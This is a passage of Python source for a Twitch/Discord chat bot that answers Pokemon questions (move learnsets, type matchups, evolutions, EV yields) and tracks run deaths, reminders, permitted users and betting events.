if self.get_game_group(source_user) == gen_name:
info_list_by_gen.append(version)
if len(info_list_by_gen) > 0:
output = poke.capitalize() + " learns " + move.replace("-", " ").title() + " "
output_chunks = []
for info in info_list_by_gen:
learn = info.get('move_learn_method').get('name')
if "machine" in learn:
learn = "TM/HM"
if "level-up" in learn:
output_chunks.append("by level up at level " + str(info.get('level_learned_at')))
else:
output_chunks.append("by " + learn)
output_chunks_set = list(set(output_chunks))
if len(output_chunks_set) > 1:
output += ", ".join(output_chunks_set[:-1])
output += " and "
output += output_chunks_set[-1]
else:
output += output_chunks_set[0]
else:
output = poke.capitalize() + " does not learn " + move.replace("-", " ").title()
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#self.output_msg(c, "Move '" + move + "' not found.", source_user)
#suggestions = self.move_corrector.suggest(move.replace('-', ' ').title(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.move_corrector.suggest(move.replace('-', ' ').title(), limit=1)
if len(suggestions) > 0:
self.processCommand("!does " + poke + " learn " + suggestions[0], c, source_user)
else:
self.output_msg(c, "Move '" + move + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#output = "Pokemon '" + poke + "' not found."
#suggestions = self.pokemon_corrector.suggest(poke.capitalize(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.pokemon_corrector.suggest(poke.capitalize(), limit=1)
if len(suggestions) > 0:
self.processCommand("!does " + suggestions[0] + " learn " + move, c, source_user)
else:
self.output_msg(c, "Pokemon '" + poke + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!item"):
name = line.split(" ", 1)[1].rstrip("\n").rstrip("\r").lower()
try:
name = name.replace(" ", "-")
i = drfujibot_pykemon.api.get(item=name,url=self.config['pokeapi_url'])
output = name.replace('-', ' ').title() + ": " + i.description + " "
held_dict = {}
for detail in i.held_by_pokemon:
for ver in detail.get('version_details'):
if self.get_game(source_user) == ver.get('version').get('name'):
rarity = str(ver.get('rarity'))
poke = detail.get('pokemon').get('name').capitalize()
if held_dict.get(rarity):
held_dict[rarity].append(poke)
else:
held_dict[rarity] = [poke]
for k in held_dict.keys():
output += "There is a " + k + "% chance of the following wild Pokemon holding this item: "
output += ", ".join(held_dict[k])
output += " "
if len(held_dict.keys()) > 0:
output += ". "
if i.value > 0:
output += "This item can be sold for $" + str(i.value) + " "
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
self.output_msg(c, "Item '" + name + "' not found.", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!weak"):
type1 = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
type2 = None
if len(line.split(" ")) > 2:
type2 = line.split(" ")[2]
type2 = type2.rstrip("\n").rstrip("\r").lower()
weaknesses = get_weaknesses(type1, type2)
output = type1.capitalize()
if type2:
output += "/" + type2.capitalize()
output += " is weak to: "
weak_strings = []
for w in weaknesses:
string = w.capitalize()
if weaknesses.count(w) == 1:
string += " (2x)"
elif weaknesses.count(w) == 2:
string += " (4x)"
weak_strings.append(string)
weak_strings = list(set(weak_strings))
output += ", ".join(weak_strings)
self.output_msg(c, output, source_user)
elif line.startswith("!resist"):
type1 = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
type2 = None
if len(line.split(" ")) > 2:
type2 = line.split(" ")[2]
type2 = type2.rstrip("\n").rstrip("\r").lower()
resistances = get_resistances(type1, type2)
# Print what's left
output = type1.capitalize()
if type2:
output += "/" + type2.capitalize()
output += " is resistant to: "
resist_strings = []
for r in resistances:
string = r.capitalize()
if resistances.count(r) == 1:
string += " (0.5x)"
elif resistances.count(r) == 2:
string += " (0.25x)"
resist_strings.append(string)
resist_strings = list(set(resist_strings))
output += ", ".join(resist_strings)
self.output_msg(c, output, source_user)
elif line.startswith("!type"):
regex = re.compile("!type (.*) against ([a-z]*) *([a-z]*)")
result = regex.match(line)
if result:
attacking_type = result.group(1).lower()
defending_type1 = result.group(2).lower()
defending_type2 = result.group(3)
if defending_type2:
defending_type2 = defending_type2.lower()
try:
t1 = drfujibot_pykemon.api.get(type=defending_type1)
t2 = None
if defending_type2:
t2 = drfujibot_pykemon.api.get(type=defending_type2)
weaknesses = [w.get('name') for w in t1.double_damage_from]
if t2:
for w in t2.double_damage_from:
weaknesses.append(w.get('name'))
resistances = [r.get('name') for r in t1.half_damage_from]
if t2:
for r in t2.half_damage_from:
resistances.append(r.get('name'))
no_dmg_types = [t.get('name') for t in t1.no_damage_from]
if t2:
for t in t2.no_damage_from:
no_dmg_types.append(t.get('name'))
# Take out no-damage types outright.
weaknesses = [w for w in weaknesses if w not in no_dmg_types]
resistances = [r for r in resistances if r not in no_dmg_types]
weaknesses_copy = weaknesses[:]
# Reduce weakness instance by one for each resistance.
for r in resistances:
if r in weaknesses:
weaknesses.remove(r)
# Reduce resistance instance by one for each weakness.
for w in weaknesses_copy:
if w in resistances:
resistances.remove(w)
# Print the result
output = attacking_type.capitalize()
if attacking_type in no_dmg_types:
output += " does no damage"
elif attacking_type in weaknesses:
output += " is super effective ("
if weaknesses.count(attacking_type) == 1:
output += "2x)"
elif weaknesses.count(attacking_type) == 2:
output += "4x)"
elif attacking_type in resistances:
output += " is not very effective ("
if resistances.count(attacking_type) == 1:
output += "0.5x)"
elif resistances.count(attacking_type) == 2:
output += "0.25x)"
else:
output += " does normal damage"
output += " against " + defending_type1.capitalize()
if defending_type2:
output += "/" + defending_type2.capitalize()
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
self.output_msg(c, "Type(s) not found.", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
else:
self.output_msg(c, "Invalid format. Usage: !type <attacking_type> against <defending_type1> <defending_type2>", source_user)
elif line.startswith("!learnset"):
regex = re.compile("!learnset (.*)")
result = regex.match(line)
poke = None
group = None
if result:
poke = result.group(1).lower()
poke = fix_pokemon_name(poke)
group = self.get_game_group(source_user)
else:
self.output_msg(c, "Invalid format. Usage: !learnset <pokemon>", source_user)
if poke and group:
output = poke.capitalize() + " "
try:
p = drfujibot_pykemon.api.get(pokemon=poke,url=self.config['pokeapi_url'])
entries = []
for move in p.moves:
for g in move.get('version_group_details'):
gen_name = g.get('version_group').get('name')
if group:
if group == gen_name:
level = g.get('level_learned_at')
if level > 0:
entries.append("| " + str(level) + " " + move.get('move').get('name').replace("-", " ").title() + " ")
entries = list(set(entries))
entries = sorted(entries, key=lambda x: int(x.split(" ")[1]))
for en in entries:
output += en
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#output = "Pokemon '" + poke + "' not found."
#suggestions = self.pokemon_corrector.suggest(poke.capitalize(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.pokemon_corrector.suggest(poke.capitalize(), limit=1)
if len(suggestions) > 0:
self.processCommand("!learnset " + suggestions[0], c, source_user)
else:
self.output_msg(c, "Pokemon '" + poke + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!tmset"):
regex = re.compile("!tmset (.*)")
result = regex.match(line)
poke = None
group = None
if result:
poke = result.group(1).lower()
poke = fix_pokemon_name(poke)
group = self.get_game_group(source_user)
else:
self.output_msg(c, "Invalid format. Usage: !tmset <pokemon>", source_user)
if poke.lower() == "mew":
self.output_msg(c, "Mew learns all the TMs. Stop trying to spam.", source_user)
else:
if poke and group:
output = poke.capitalize() + ": "
try:
p = drfujibot_pykemon.api.get(pokemon=poke,url=self.config['pokeapi_url'])
entries = []
for move in p.moves:
for g in move.get('version_group_details'):
gen_name = g.get('version_group').get('name')
if group:
if group == gen_name:
if 'machine' in g.get('move_learn_method').get('name'):
entries.append(move.get('move').get('name').replace("-", " ").title())
entries = list(set(entries))
output += ", ".join(map(str, entries))
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#output = "Pokemon '" + poke + "' not found."
#suggestions = self.pokemon_corrector.suggest(poke.capitalize(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.pokemon_corrector.suggest(poke.capitalize(), limit=1)
if len(suggestions) > 0:
self.processCommand("!tmset " + suggestions[0], c, source_user)
else:
self.output_msg(c, "Pokemon '" + poke + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!setgame"):
regex = re.compile("!setgame (.*)")
result = regex.match(line)
if result:
game = result.group(1)
valid_games = [
'red',
'blue',
'yellow',
'gold',
'silver',
'crystal',
'ruby',
'sapphire',
'emerald',
'fire-red',
'leaf-green',
'diamond',
'pearl',
'platinum',
'heart-gold',
'soul-silver',
'black',
'white',
'black-2',
'white-2',
'x',
'y',
'omega-ruby',
'alpha-sapphire',
'rising-ruby',
'sun',
'moon'
]
game = game.replace(' ', '-').lower()
if "ultra-sun" == game:
game = "sun"
if "ultra-moon" == game:
game = "moon"
original_game_str = game
isRising = False
isGen7 = False
if game == 'firered':
game = 'fire-red'
elif game == 'leafgreen':
game = 'leaf-green'
elif game == 'heartgold':
game = 'heart-gold'
elif game == 'soulsilver':
game = 'soul-silver'
elif game == 'omegaruby' or game == 'rising-ruby' or game == 'risingruby':
game = 'omega-ruby'
isRising = True
elif game == 'alphasapphire' or game == 'sinking-sapphire' or game == 'sinkingsapphire':
game = 'alpha-sapphire'
isRising = True
elif game == 'sun' or game == 'moon':
isGen7 = True
if game in valid_games:
config = None
if self.whisperMode == True:
if self.bot_type and self.bot_type == 'discord':
configname = 'whisper_discord.json'
else:
configname = 'whisper.json'
with open(configname, 'r') as config_file:
config = json.load(config_file)
if config:
config['games'][source_user] = game
if isRising:
config['pokeapi_url'] = 'http://localhost:8001/api/v2'
self.config['pokeapi_url'] = 'http://localhost:8001/api/v2'
else:
config['pokeapi_url'] = ''
self.config['pokeapi_url'] = ''
with open(configname, 'w') as config_file:
config_file.write(json.dumps(config))
else:
self.config['games'][self.username] = game
if isRising:
self.config['pokeapi_url'] = 'http://localhost:8001/api/v2'
else:
self.config['pokeapi_url'] = ''
if None != self.config.get('current_run') and len(self.config.get('current_run')) > 0 and None != self.config.get('run_data'):
self.config['run_data'][self.config['current_run']]['game'] = game
self.update_config()
self.game = game
output = "Set game to Pokemon " + original_game_str.replace('-', ' ').title() + " SeemsGood"
self.output_msg(c, output, source_user)
else:
self.output_msg(c, "Invalid game. Usage: !setgame <game name>", source_user)
else:
self.output_msg(c, "Invalid format. Usage: !setgame <game name>", source_user)
elif line.startswith("!evol"):
name = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
name = fix_pokemon_name(name)
try:
species = drfujibot_pykemon.api.get(species=name,url=self.config['pokeapi_url'])
chain_id = species.evolution_chain_url.split("/")[-2]
ch = drfujibot_pykemon.api.get(evo_chain=chain_id,url=self.config['pokeapi_url'])
this_chain = find_chain(ch.chain, name)
output = ""
if len(this_chain.get('evolves_to')) == 0:
found_mega = False
for var in species.varieties:
if var.get('pokemon').get('name').endswith('-mega'):
output += name.capitalize() + " mega evolves to Mega " + name.capitalize()
found_mega = True
break
if not found_mega:
output += name.capitalize() + " does not evolve any further."
else:
for evo_chain in this_chain.get('evolves_to'):
if len(evo_chain.get('evolution_details')) == 1:
output += name.capitalize() + " evolves into " + evo_chain.get('species').get('name').capitalize() + " "
details = evo_chain.get('evolution_details')[0]
if details.get('min_level'):
output += "at level " + str(details.get('min_level'))
if details.get('gender'):
output += ", if female."
elif details.get('relative_physical_stats') is not None:
value = details.get('relative_physical_stats')
if 0 == value:
output += ", if Attack = Defense."
elif 1 == value:
output += ", if Attack > Defense."
elif -1 == value:
output += ", if Attack < Defense."
elif details.get('needs_overworld_rain'):
output += ", if it's raining."
elif details.get('turn_upside_down'):
output += ", if the 3DS is held upside down."
else:
output += "."
elif details.get('min_beauty'):
output += "with beauty level " + str(details.get('min_beauty') + ".")
elif details.get('min_happiness'):
output += "with happiness level " + str(details.get('min_happiness'))
if details.get('time_of_day'):
output += " when it is " + details.get('time_of_day') + "-time."
else:
output += "."
elif details.get('time_of_day'):
output += "when it is " + details.get('time_of_day') + "-time."
elif details.get('item') and details.get('trigger'):
item = details.get('item').get('name').replace('-', ' ').title()
trigger = details.get('trigger').get('name')
if "use-item" == trigger: output += "when a " + item + " is used on it."
elif details.get('known_move_type') and details.get('min_affection'):
move_type = details.get('known_move_type').get('name').capitalize()
affection = details.get('min_affection')
output += "with affection level " + str(affection) + " and knowing a " + move_type + " type move."
elif details.get('known_move'):
output += "upon level-up when it knows " + details.get('known_move').get('name').replace('-', ' ').title()
elif details.get('trigger'):
if "trade" == details.get('trigger').get('name'):
output += "when traded"
if details.get('held_item'):
output += " and holding a " + details.get('held_item').get('name').replace('-', ' ').title() + "."
else:
output += "."
elif "shed" == details.get('trigger').get('name'):
output += "if an extra party slot is open and an extra PokeBall is available."
else:
for det in evo_chain.get('evolution_details'):
if det.get('location'):
loc_id = det.get('location').get('url').split('/')[-2]
try:
loc = drfujibot_pykemon.api.get(location=loc_id)
if loc.region == getRegionForGame(self.get_game(source_user)):
output += name.capitalize() + " evolves into " + evo_chain.get('species').get('name').capitalize() + " "
output += "at " + loc.name.replace('-', ' ').title()
if det.get('trigger'):
if "level-up" == det.get('trigger').get('name'):
output += " by level up."
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
output += " "
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#output = "Pokemon '" + name + "' not found."
#suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=1)
if len(suggestions) > 0:
self.processCommand("!evol " + suggestions[0], c, source_user)
else:
self.output_msg(c, "Pokemon '" + name + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!char"):
if len(line.split(" ")) >= 2:
phrase = line.split(" ", 1)[1].rstrip("\n").rstrip("\r").lower()
try:
# Can't query by name, just grab all 30 and loop through them.
characteristics = []
for i in range(30):
ch = drfujibot_pykemon.api.get(characteristic=(i+1))
characteristics.append(ch)
output = ""
for ch in characteristics:
if phrase.lower() == ch.description:
output += phrase.capitalize() + ": Highest IV is "
iv = ch.highest_stat.replace('-', ' ').title()
if iv == "Hp":
iv = "HP"
output += iv + ". Possible values are: "
str_values = []
for v in ch.possible_values:
str_values.append(str(v))
values = ", ".join(str_values)
output += values
break
if len(output) == 0:
output = "Characteristic '" + phrase + "' not found."
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
self.output_msg(c, "Characteristic not found.", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!ev "):
name = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
name = fix_pokemon_name(name)
try:
p = drfujibot_pykemon.api.get(pokemon=name,url=self.config['pokeapi_url'])
output = name.capitalize() + " EV Yield: "
evs = []
for stat in p.stats:
if stat.get('effort') > 0:
evs.append(stat.get('stat').get('name').replace('-', ' ').title() + "(" + str(stat.get('effort')) + ")")
output += " ".join(evs)
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#output = "Pokemon '" + name + "' not found."
#suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=1)
if len(suggestions) > 0:
self.processCommand("!ev " + suggestions[0], c, source_user)
else:
self.output_msg(c, "Pokemon '" + name + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!grassknot") or line.startswith("!lowkick"):
name = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
name = fix_pokemon_name(name)
try:
p = drfujibot_pykemon.api.get(pokemon=name,url=self.config['pokeapi_url'])
output = "Low Kick/Grass Knot has "
if p.weight < 100:
bp = "20"
elif p.weight < 250:
bp = "40"
elif p.weight < 500:
bp = "60"
elif p.weight < 1000:
bp = "80"
elif p.weight < 2000:
bp = "100"
else:
bp = "120"
output += bp
output += " base power against " + name.capitalize() + " ("
output += str(float(p.weight) / 10)
output += " kg)"
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#output = "Pokemon '" + name + "' not found."
#suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=1)
if len(suggestions) > 0:
self.processCommand("!grassknot " + suggestions[0], c, source_user)
else:
self.output_msg(c, "Pokemon '" + name + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!heatcrash") or line.startswith("!heavyslam"):
name = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
name = fix_pokemon_name(name)
name2 = line.split(" ")[2].rstrip("\n").rstrip("\r").lower()
name2 = fix_pokemon_name(name2)
try:
p1 = drfujibot_pykemon.api.get(pokemon=name,url=self.config['pokeapi_url'])
p2 = drfujibot_pykemon.api.get(pokemon=name2, url=self.config['pokeapi_url'])
output = "Heavy Slam/Heat Crash used by "
bp = "40"
if p1.weight > p2.weight:
relative = p2.weight / p1.weight
if relative > .5:
bp = "40"
elif relative > .3334:
bp = "60"
elif relative > .25:
bp = "80"
elif relative > .2:
bp = "100"
else:
bp = "120"
output += name.capitalize() + " has " + bp + " base power against " + name2.capitalize()
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#output = "Pokemon '" + name + "' not found."
#suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=1)
if len(suggestions) > 0:
self.processCommand("!heatcrash " + suggestions[0], c, source_user)
else:
self.output_msg(c, "Pokemon '" + name + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!gender"):
name = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
name = fix_pokemon_name(name)
try:
p = drfujibot_pykemon.api.get(species=name,url=self.config['pokeapi_url'])
output = name.capitalize() + ": "
if -1 == p.gender_rate:
output += "Genderless"
else:
percent_female = ( float(p.gender_rate) / float(8) ) * 100
percent_male = 100 - percent_female
output += "Male(" + str(percent_male) + "%) Female(" + str(percent_female) + "%)"
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#output = "Pokemon '" + name + "' not found."
#suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=1)
if len(suggestions) > 0:
self.processCommand("!gender " + suggestions[0], c, source_user)
else:
self.output_msg(c, "Pokemon '" + name + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!faster"):
if len(line.split(" ")) > 2:
pokemon1 = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
pokemon2 = line.split(" ")[2].rstrip("\n").rstrip("\r").lower()
pokemon1 = fix_pokemon_name(pokemon1)
pokemon2 = fix_pokemon_name(pokemon2)
try:
p1 = drfujibot_pykemon.api.get(pokemon=pokemon1,url=self.config['pokeapi_url'])
try:
p2 = drfujibot_pykemon.api.get(pokemon=pokemon2,url=self.config['pokeapi_url'])
if p1.speed > p2.speed:
output = pokemon1.capitalize() + " (" + str(p1.speed) + ") is faster than " + pokemon2.capitalize() + " (" + str(p2.speed) + ")"
elif p1.speed < p2.speed:
output = pokemon1.capitalize() + " (" + str(p1.speed) + ") is slower than " + pokemon2.capitalize() + " (" + str(p2.speed) + ")"
elif p1.speed == p2.speed:
output = pokemon1.capitalize() + " and " + pokemon2.capitalize() + " are tied for speed (" + str(p1.speed) + ")"
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#output = "Pokemon '" + pokemon2 + "' not found."
#suggestions = self.pokemon_corrector.suggest(pokemon2.capitalize(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.pokemon_corrector.suggest(pokemon2.capitalize(), limit=1)
if len(suggestions) > 0:
self.processCommand("!faster " + pokemon1 + " " + suggestions[0], c, source_user)
else:
self.output_msg(c, "Pokemon '" + pokemon2 + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#output = "Pokemon '" + pokemon1 + "' not found."
#suggestions = self.pokemon_corrector.suggest(pokemon1.capitalize(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.pokemon_corrector.suggest(pokemon1.capitalize(), limit=1)
if len(suggestions) > 0:
self.processCommand("!faster " + suggestions[0] + " " + pokemon2, c, source_user)
else:
self.output_msg(c, "Pokemon '" + pokemon1 + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
else:
self.output_msg(c, "Please input more than one pokemon.", source_user)
elif line.startswith("!exp"):
name = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
name = fix_pokemon_name(name)
try:
p = drfujibot_pykemon.api.get(pokemon=name,url=self.config['pokeapi_url'])
output = name.capitalize() + ": " + str(p.base_experience) + " Base Exp."
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#output = "Pokemon '" + name + "' not found."
#suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=1)
if len(suggestions) > 0:
self.processCommand("!exp " + suggestions[0], c, source_user)
else:
self.output_msg(c, "Pokemon '" + name + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!remind"):
if len(line.split(" ")) > 2:
timestring = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
message = line.split(" ", 2)[2].rstrip("\n").rstrip("\r")
delta = parse_time(timestring)
if delta:
self.output_msg(c, "I will remind you in " + timestring + " to " + message, source_user)
reminder = ""
if self.bot_type and self.bot_type == "discord":
if source_id:
# Discord main channel mode
reminder = "Reminder <@!" + source_id + "> : " + message
else:
# Discord whisper mode
reminder = "Reminder: " + message
else:
# Twitch mode
reminder = "Reminder @" + source_user + " : " + message
t = threading.Timer(delta.total_seconds(), self.output_msg, [c, reminder, source_user])
t.start()
else:
self.output_msg(c, "Invalid time string. Examples: 5m 5m30s 1h5m30s", source_user)
else:
self.output_msg(c, "Format: !remind <time> <message>", source_user)
elif line.startswith("!deaths"):
deaths = self.get_current_run_data('deaths')
if None == deaths:
deaths = str(self.deaths)
else:
deaths = str(deaths)
sorted_fallen = sorted(self.fallen_timestamps.items(), key=operator.itemgetter(1), reverse=True)
recent_deaths = []
for i in range(min(3, len(sorted_fallen))):
recent_deaths.append(sorted_fallen[i][0])
self.output_msg(c, "There have been " + deaths + " deaths so far. Most recent deaths (latest first): " + ", ".join(recent_deaths), source_user)
elif line.startswith("!setdeaths"):
if len(line.split(" ")) == 2:
try:
deaths = int(line.split(" ")[1].rstrip("\n").rstrip("\r"))
self.deaths = deaths
self.config['deaths'] = deaths
if None != self.config['current_run'] and None != self.config['run_data']:
if None != self.config['run_data'].get(self.config['current_run']):
self.config['run_data'][self.config['current_run']]['deaths'] = deaths
self.update_config()
self.output_msg(c, "Set death counter to " + str(self.deaths), source_user)
except:
self.output_msg(c, "Format: !setdeaths <number>", source_user)
else:
self.output_msg(c, "Format: !setdeaths <number>", source_user)
elif line.startswith("!rip") and not line.startswith("!riprun"):
if len(line.split(" ")) > 1:
pokemon = line.split(" ", 1)[1]
else:
pokemon = ""
if self.meme_mode:
if None == self.current_deaths.get(pokemon):
self.deaths += 1
self.config['deaths'] = self.deaths
if None != self.config['current_run'] and None != self.config['run_data']:
if None != self.config['run_data'].get(self.config['current_run']):
self.config['run_data'][self.config['current_run']]['deaths'] = self.deaths
self.update_config()
output = "Death counter: " + str(self.deaths) + " riPepperonis "
output += "Press F to pay respects to '" + pokemon + "'"
self.output_msg(c, output, source_user)
self.current_deaths[pokemon] = time.time()
self.deaths_dict[pokemon] = []
else:
self.deaths += 1
output = "Death counter: " + str(self.deaths) + " riPepperonis "
self.output_msg(c, output, source_user)
self.config['deaths'] = self.deaths
if None != self.config['current_run'] and None != self.config['run_data']:
if None != self.config['run_data'].get(self.config['current_run']):
self.config['run_data'][self.config['current_run']]['deaths'] = self.deaths
self.update_config()
elif line.startswith("!ez"):
if self.meme_mode:
self.ez = True
self.ez_count = 0
self.ez_start = time.time()
output = "Type EZ to pay respects to PC"
self.output_msg(c, output, source_user)
elif line.startswith("!fallen"):
sorted_pairs = sorted(self.fallen.items(), key=operator.itemgetter(1), reverse=True)
output = "The most respected fallen: "
if len(sorted_pairs) >= 1:
output += sorted_pairs[0][0]
output += " (" + str(sorted_pairs[0][1]) + ")"
if len(sorted_pairs) >= 2:
output += ", "
output += sorted_pairs[1][0]
output += " (" + str(sorted_pairs[1][1]) + ")"
if len(sorted_pairs) >= 3:
output += ", "
output += sorted_pairs[2][0]
output += " (" + str(sorted_pairs[2][1]) + ")"
self.output_msg(c, output, source_user)
elif line.startswith("!adduser"):
if len(line.split(" ")) == 2:
new_user = line.split(" ")[1].rstrip("\n").rstrip("\r")
self.permitted_users.append(new_user.lower())
save_users = self.permitted_users[:]
if self.username.lower() in save_users:
save_users.remove(self.username.lower())
self.config['permitted_users'] = save_users
self.update_config()
self.output_msg(c, "Added user '" + new_user + "' to permitted users.", source_user)
else:
self.output_msg(c, "Format: !adduser <username>", source_user)
elif line.startswith("!removeuser"):
if len(line.split(" ")) == 2:
remove_user = line.split(" ")[1].rstrip("\n").rstrip("\r")
if remove_user.lower() in self.permitted_users:
self.permitted_users.remove(remove_user.lower())
save_users = self.permitted_users[:]
if self.username.lower() in save_users:
save_users.remove(self.username.lower())
self.config['permitted_users'] = save_users
self.update_config()
self.output_msg(c, "Removed user '" + remove_user + "' from permitted users.", source_user)
else:
self.output_msg(c, "User '" + remove_user + "' not found.", source_user)
else:
self.output_msg(c, "Format: !removeuser <username>", source_user)
elif line.startswith("!addshoutout"):
if len(line.split(" ")) == 2:
new_user = line.split(" ")[1].rstrip("\n").rstrip("\r")
if new_user not in self.config['auto_shoutout']:
self.config['auto_shoutout'].append(new_user.lower())
self.update_config()
self.output_msg(c, "Added user '" + new_user + "' to auto-shoutout.", source_user)
else:
self.output_msg(c, "Format: !addshoutout <username>", source_user)
elif line.startswith("!removeshoutout"):
if len(line.split(" ")) == 2:
remove_user = line.split(" ")[1].rstrip("\n").rstrip("\r")
if remove_user.lower() in self.config['auto_shoutout']:
self.config['auto_shoutout'].remove(remove_user.lower())
self.update_config()
self.output_msg(c, "Removed user '" + remove_user + "' from auto-shoutout.", source_user)
else:
self.output_msg(c, "User '" + remove_user + "' not found.", source_user)
else:
self.output_msg(c, "Format: !removeshoutout <username>", source_user)
elif line.startswith("!whatis"):
name = line.split(" ", 1)[1].rstrip("\n").rstrip("\r").lower()
name = name.replace(" ", "-")
try:
m = drfujibot_pykemon.api.get(move=name,url=self.config['pokeapi_url'])
self.processCommand("!move " + name, c, source_user, prefix="Move: ")
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
try:
a = drfujibot_pykemon.api.get(ability=name,url=self.config['pokeapi_url'])
self.processCommand("!ability " + name, c, source_user, prefix="Ability: ")
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
self.output_msg(c, "Could not find '" + name + "'", source_user)
elif line.startswith("!anagram"):
word = line.split(" ", 1)[1].rstrip("\n").rstrip("\r").lower()
if len(word) <= 10:
a = Anagram(word)
anagram_list = a.get_anagrams()
random.shuffle(anagram_list)
output = "Anagrams: "
if len(anagram_list) > 1:
output += ", ".join(anagram_list)
else:
output += "(none)"
if len(output) > 240:
output = output[:240]
output = output.rsplit(", ", 1 )[0]
else:
output = "Word too long, max 10 characters"
self.output_msg(c, output, source_user)
elif line.startswith("!event"):
self.new_bet(c, line, source_user)
elif line.startswith("!close"):
if self.foundCoinFile:
if len(line.split(" ")) == 2:
event_name = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
if event_name in self.open_events.keys():
self.closed_events[event_name] = self.open_events[event_name]
del self.open_events[event_name]
self.output_msg(c, "Betting has closed for '" + event_name + "' event!", source_user)
self.config['open_events'] = self.open_events
self.config['closed_events'] = self.closed_events
if None != self.config['current_run'] and None != self.config['run_data']:
if None != self.config['run_data'].get(self.config['current_run']):
self.config['run_data'][self.config['current_run']]['closed_events'] = copy.deepcopy(self.closed_events)
self.update_config()
else:
self.output_msg(c, "Event '" + event_name + "' not found", source_user)
else:
